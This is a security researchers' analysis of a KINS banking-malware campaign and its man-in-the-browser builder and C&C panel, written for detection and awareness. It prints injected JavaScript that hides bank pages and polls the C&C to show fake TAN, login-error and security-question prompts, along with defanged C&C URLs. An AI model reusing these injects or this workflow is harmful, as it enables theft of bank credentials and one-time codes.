
Revealing Unique MitB Builder C&C Server

Short Technical Analyses for Intel and Awareness

Senad Aruc & Davide Cioccia

March 2015

(1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-unique-atsengine-cc-server?trk=prof-post

(2) http://en.wikipedia.org/wiki/Man-in-the-browser

INTRODUCTION

In the past we have analysed all the well-known malware families and their C&C servers. We saw a “Kins” malware with a unique “ATS” engine acting like a real electronic web banking application in auto-pilot mode (1). We all know how easy it is to go underground and buy a malware kit with MitB (2) add-ons for well-known electronic banking web applications, or to order a custom one. These injectors are the main weapon used by the bad guys against electronic banking applications where 2-factor authentication “Tokens” is implemented.

Man in the Browser Attack (2)


Bypassing the 2 factor authentication (3)

ATTACK

We were given the exclusive right to analyse this malware sample, which is targeting a large financial institution located in the EU. It is a targeted attack with three main components.

•   Malware “KINS”
    o   Version: 2.0
    o   First seen: 14.02.2015
    o   MD5: babc53295da4cd953a1cae1e33de4910

•   C&C “Zeus”
    o   Configuration: hxxx://hidden.ru:80/1/uggi/binari/hy78.jpg → Config
    o   Drop-Zone: hxxx://hidden.ru:80/1/uggi/gate.php → Gate
    o   Binary: hxxx://hidden.ru:80/1/uggi/binari/bot.exe → Malware

•   MitB C&C “Blocks”
    o   Base64 encoded: aHR0cHM6Ly9hiddencnkuY29tLhiddenaHA=
    o   Base64 decoded: hxxs://hidden.com:443/s/g.php → Gate
    o   hxxx://hidden.com:443/s/manual.php → Russian manual for Blocks
    o   hxxx://hidden.com:443/s/center.php → C&C server for Blocks MitB


INSIDE MITB C&C BLOCKS

This unique MitB builder is designed to help even an inexperienced hacker build MitB attacks just by adding and configuring blocks for every single function and step. Using this method the hacker can interact with the victim’s actions in a hidden way, pushing injected commands into the browser and hiding them by manipulating CSS, HTML and JavaScript.

C&C Blocks MitB Server Login Page


The home page of the C&C server is divided into 3 sections.

1.   The first section shows the attack campaign details for each bank.
2.   The second section lists the online victims (bots).
3.   The last section lists the offline victims (bots).

MitB Server Welcome Page


The edit function located in the first section is for building a MitB for the victims of that specific bank group. Here we can see the blocks for building the perfect MitB attack.

MitB Group Builder

The command list for every block is described in this dropdown list.

•   Go – Allows the victim to reach the e-banking web application
•   Question – Builds a custom questionnaire for the victim
•   Error Question – Asks a question with an error output
•   Tan – JavaScript function
•   Error Tan – JavaScript function
•   Hold – The function run when the victim clicks the button for a transaction
•   Error Login – Tricks the victim into believing the login details are not correct
•   Kick – Kicks the victim out of the e-banking application
•   Confirm – Builds fake confirmation messages
•   Page – Forwards the victim to a different page


Drop-Down List Commands

Another function of this MitB builder is custom injections for every single victim-bot. Here we can see the inject functions that the attacker can build for a specific victim-bot. The username and the OTP password for every single command can be seen in the info marked with the red box.

The attackers can configure the following inject functions.

•   Button Text
•   Command
•   Parameter 1
•   Parameter 3
•   Style


Specific Injections per Victim

The attack is alive and the number of new victims is 5-10 per day.

List of the victims


The only manual that we managed to discover is a short description of this MitB.

English Translation:

Manual for this MitB builder

Leadership

1. Statistic: Each bank is assigned an initial value of whether to skip authentication at login.
   hold - delay the user for param1 seconds; param2 and param3 are not taken into account. If the admin operator is not online then the user will be skipped.
   go - let the user pass; the parameters are not taken into account.

2. Last results:
   For multi-query:
   info_send_1 - The requested information was sent
   info_send_2 - Information of the second page has been sent
   For single-query:
   info_send - info sent


INJECTIONS

During our analysis, we detected the configuration file used by the KINS malware to steal sensitive information from end users. The injected script presents the default configuration of financial malware, using a webinject entry with different fields:

•   Entry: Type of injection performed by the malware
•   Target: The real target, an online banking portal.
•   Flags: HTTP methods that the malware needs to intercept to change the HTML code inside the HTTP response. We found two flags inside the configuration file:
    o   P - used to intercept an HTTP POST request
    o   G - used to intercept an HTTP GET request
•   data_before_inject: the exact point where the webinject is installed
•   data_end: the last point after the injection.
•   data_inject: the real JavaScript injection
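The entry layout just described, as an added example that is not code from the report: a small Node.js parser for a Zeus/KINS-style webinject file. It assumes the standard Zeus keywords (set_url with G/P flags, data_before, data_inject, data_after, each closed by data_end); the sample config, hosts and script names are constructed. The triage helper flags entries whose injected script blanks the page body, the first operation the report observes.

```javascript
// Added example, not code from the report: parse a Zeus/KINS-style webinject
// config and summarise each entry. The sample config below is constructed.
const SAMPLE_WEBINJECT = `
set_url https://bank.example/login* GP
data_before
<body*>
data_end
data_inject
<script>jQuery('body').hide();</script>
data_end
data_after
data_end
set_url https://bank.example/account/* G
data_before
</head>
data_end
data_inject
<script src="https://static.invalid/js/inject.js"></script>
data_end
data_after
data_end
`;
const FLAG_METHODS = { G: 'GET', P: 'POST' };  // flag letter -> hooked HTTP method

function parseWebinject(text) {
  const entries = [];
  let current = null;   // entry currently being filled
  let section = null;   // 'data_before' | 'data_inject' | 'data_after'
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (line.startsWith('set_url ')) {
      const [, target, flags = ''] = line.split(/\s+/);
      current = { target, flags, methods: [...flags].map(f => FLAG_METHODS[f] || f),
                  data_before: '', data_inject: '', data_after: '' };
      entries.push(current);
    } else if (/^data_(before|inject|after)$/.test(line)) {
      section = line;                      // following lines belong to this field
    } else if (line === 'data_end') {
      section = null;
    } else if (current && section && line !== '') {
      current[section] += (current[section] ? '\n' : '') + line;
    }
  }
  return entries;
}
// Triage helper: targets whose injected script blanks the page body, as in the report.
function findBodyHidingTargets(entries) {
  return entries.filter(e => /body.*\.hide\(\)/.test(e.data_inject)).map(e => e.target);
}
```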

As we can see from the configuration file, the first operation made by the malware is to hide the whole content of the HTML body, with the following operation:

    jQuery('body').hide();

After that, the user is blocked for a short period, until the malware receives instructions from the C&C server. In this code snippet we can see the commands shared between client and server:

    // Polls the C&C gate for the command to apply to this victim;
    // do2 holds the server reply (command first, then its arguments).
    function checkReturnCommand()
    {
        var req = "send=2&u_bot_id=" + bot_id + "&bn=euHypo&u_login=&u_pass=&log=cbf_check_command";
        function check_command()
        {
            if ( do2[0] == 'go')
            {
                logMessages( 'let user go', 'go', '', '' );
            }
            else if( do2[0] == 'errorlogin')
            {
                logMessages( 'Show Error Login or Tan Message to Holder', do2[0], do2[1], do2[2] );
                clearInterval(checkInterval);
            }
            else if( do2[0] == 'question')
            {
                logMessages( 'Show Question[' + do2[1] + ']', do2[0], do2[1], do2[2] );
                clearInterval(checkInterval);
            }
        }
        sendScriptRequest(sa, req, check_command, ["test123"]);
    }

This function is a callback from the server to check the user status. If the C&C answers with a go command, the malware stops execution and the user can navigate the website, going to the next webpage. The 'errorlogin' command can show an error or a TAN request in the user's browser to steal the dynamic part of the credentials. The 'question' command can show the secret question and answer panel, to steal the information needed to recover a lost password.

Another function has different commands to perform different actions:

    // Second callback: ret_val is the server status, do2 the command and its arguments.
    function statusCall()
    {
        if( ret_val == '0')
        {
            if (( do2[0] == 'go') || ( do2[0] == 'go_inactive'))
            {
                logMessages( 'let user go', 'go', '', '' );
            }
            else if( ( do2[0] == 'hold' ) || ( do2[0] == 'tan' ) )
            {
                logMessages('Hold after login,show first throbber for ' + sTimer + ' Sec', 'throb', '', '');
                return false;
            }
        }
        else if( ret_val == 'block')
        {
            logMessages('Show block fake', 'block', '', '');
            return false;
        }
    }
    sendScriptRequest(sa, req, statusCall, ["test123"]);

Here we have the 'hold', 'tan' and 'block' commands, which hold information, show the TAN authentication panel and block the user with a fake message.

CONCLUSION

A normal antivirus cannot detect this kind of advanced malware. Once the malware infects a machine, it can change its behaviour and code continuously to avoid signature-based detection. This new MitB builder is also changing the way the MitB injector is built and sold on black markets. Using this builder, every normal user can build their own MitB inject and target different banks in no time. A new injection, or a complete malware, can be bought from forums and markets on the dark web for a few Bitcoins or a hundred dollars. A complete solution provides the C&C panel (dropzone), the malware, the injection, a spam campaign and, if needed, a malicious mobile application to steal sensitive data like OTPs.

To protect end users from this risk, financial institutions have to choose solutions that can detect changed behaviour in the webpage and in the user experience. The possibility of making custom web injects for every single action makes this attack different for each bank. Signature-based detection can be avoided by obfuscating the code with different techniques and methodologies, but there are solutions that raise an alert when the integrity of the webpage is compromised. Solutions named Active Fraud Prevention can dynamically analyse the HTML resources and fingerprint users to detect multiple connections from different countries within a short time (“Session Stealing”).

ABOUT

Senad Aruch
Multiple Certified ISMS Professional with a 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security. Currently holding a Senior Lead position.
E-Mail: [email protected]
Blog: www.senadaruc.com
Twitter: senadaruch
LinkedIn: linkedin.com/in/senadaruc

Davide Cioccia
MSc Computer Engineering Degree. Security Developer focused on Cyber Security Intelligence, Malware analysis, Anti-fraud systems. Microsoft certified. Currently holding a Security Consultant position.
E-Mail: [email protected]
Twitter: david107
LinkedIn: linkedin.com/in/davidecioccia